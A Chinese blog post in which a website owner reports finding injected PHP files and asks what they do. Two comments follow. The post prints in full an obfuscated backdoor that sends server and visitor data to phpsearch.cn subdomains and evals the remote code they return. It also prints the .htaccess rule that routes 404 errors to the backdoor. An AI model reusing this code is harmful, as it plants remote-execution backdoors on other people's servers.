最新更新:对代码仔细看了一下,该代码的作用是通过.htaccess设置,当网站出现404错误时,也就是网页不存在的时候,就会自动跳转到43199.php,而这个网页指向了网站phpsearch.cn上的一个网页,估计是广告页,http://ads1.phpsearch.cn http://7.phpsearch.cn http://71.phpsearch.cn ,从这个网站内容也可以看出。最后问候一下phpsearch.cn站长老母。
无意之中发现网站上多了一个文件43199.php,文件内容如下:
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e04e1a59fe4e05f21b79d8bc541a683e") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
每个目录下都有这样一个文件,只是文件名不同,都是数字的。还有一个.htaccess文件,内容如下:
Options -MultiViews
ErrorDocument 404 //attachments/date_200706/81783.php
疑似被人注入了,所以把网站内容回档了一下,以上文件内容具体能实现什么功能,偶也不知道,请高人指点,3Q
2 条评论
获取网站的主机信息 + 挂马哩
是很郁闷,就像家里被人占了一小块似的!
PHP,俺也不大懂,就帮不了了!